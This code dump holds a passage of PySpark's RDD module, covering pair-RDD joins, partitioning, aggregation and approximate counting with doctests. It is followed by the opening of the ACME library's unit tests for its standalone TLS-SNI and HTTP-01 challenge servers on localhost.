>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
spill = self._can_spill()
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
def _can_spill(self):
return self.ctx._conf.get("spark.shuffle.spill", "True").lower() == "true"
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
spill = self._can_spill()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)\
if spill else InMemoryMerger(agg)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)], False)
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> (rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> (rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
if relativeSD > 0.37:
raise ValueError("relativeSD should be smaller than 0.37")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
for partition in range(self.getNumPartitions()):
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps((command, sys.version_info[:2]))
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
standalone_test.py
|
"""Tests for acme.standalone."""
import multiprocessing
import os
import shutil
import socket
import threading
import tempfile
import unittest
import time
from contextlib import closing
from six.moves import http_client # pylint: disable=import-error
from six.moves import socketserver # type: ignore # pylint: disable=import-error
import josepy as jose
import mock
import requests
from acme import challenges
from acme import crypto_util
from acme import errors
from acme import test_util
from acme.magic_typing import Set # pylint: disable=unused-import, no-name-in-module
class TLSServerTest(unittest.TestCase):
"""Tests for acme.standalone.TLSServer."""
def test_bind(self): # pylint: disable=no-self-use
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True)
server.server_close()
def test_ipv6(self):
if socket.has_ipv6:
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True, ipv6=True)
server.server_close()
class TLSSNI01ServerTest(unittest.TestCase):
"""Test for acme.standalone.TLSSNI01Server."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
from acme.standalone import TLSSNI01Server
self.server = TLSSNI01Server(('localhost', 0), certs=self.certs)
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown()
self.thread.join()
def test_it(self):
host, port = self.server.socket.getsockname()[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1)
self.assertEqual(jose.ComparableX509(cert),
jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01ServerTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01Server."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01Server
self.server = HTTP01Server(('', 0), resources=self.resources)
self.port = self.server.socket.getsockname()[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown()
self.thread.join()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
class BaseDualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.BaseDualNetworkedServers."""
class SingleProtocolServer(socketserver.TCPServer):
"""Server that only serves on a single protocol. FreeBSD has this behavior for AF_INET6."""
def __init__(self, *args, **kwargs):
ipv6 = kwargs.pop("ipv6", False)
if ipv6:
self.address_family = socket.AF_INET6
kwargs["bind_and_activate"] = False
else:
self.address_family = socket.AF_INET
socketserver.TCPServer.__init__(self, *args, **kwargs)
if ipv6:
# NB: On Windows, socket.IPPROTO_IPV6 constant may be missing.
# We use the corresponding value (41) instead.
level = getattr(socket, "IPPROTO_IPV6", 41)
self.socket.setsockopt(level, socket.IPV6_V6ONLY, 1)
try:
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
@mock.patch("socket.socket.bind")
def test_fail_to_bind(self, mock_bind):
mock_bind.side_effect = socket.error
from acme.standalone import BaseDualNetworkedServers
self.assertRaises(socket.error, BaseDualNetworkedServers,
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
def test_ports_equal(self):
from acme.standalone import BaseDualNetworkedServers
servers = BaseDualNetworkedServers(
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
socknames = servers.getsocknames()
prev_port = None
# assert ports are equal
for sockname in socknames:
port = sockname[1]
if prev_port:
self.assertEqual(prev_port, port)
prev_port = port
class TLSSNI01DualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.TLSSNI01DualNetworkedServers."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
from acme.standalone import TLSSNI01DualNetworkedServers
self.servers = TLSSNI01DualNetworkedServers(('localhost', 0), certs=self.certs)
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_connect(self):
socknames = self.servers.getsocknames()
# connect to all addresses
for sockname in socknames:
host, port = sockname[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1)
self.assertEqual(jose.ComparableX509(cert),
jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01DualNetworkedServersTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01DualNetworkedServers."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01DualNetworkedServers
self.servers = HTTP01DualNetworkedServers(('', 0), resources=self.resources)
self.port = self.servers.getsocknames()[0][1]
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
class TestSimpleTLSSNI01Server(unittest.TestCase):
"""Tests for acme.standalone.simple_tls_sni_01_server."""
def setUp(self):
# mirror ../examples/standalone
self.test_cwd = tempfile.mkdtemp()
localhost_dir = os.path.join(self.test_cwd, 'localhost')
os.makedirs(localhost_dir)
shutil.copy(test_util.vector_path('rsa2048_cert.pem'),
os.path.join(localhost_dir, 'cert.pem'))
shutil.copy(test_util.vector_path('rsa2048_key.pem'),
os.path.join(localhost_dir, 'key.pem'))
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.port = sock.getsockname()[1]
from acme.standalone import simple_tls_sni_01_server
self.process = multiprocessing.Process(target=simple_tls_sni_01_server,
args=(['path', '-p', str(self.port)],))
self.old_cwd = os.getcwd()
os.chdir(self.test_cwd)
def tearDown(self):
os.chdir(self.old_cwd)
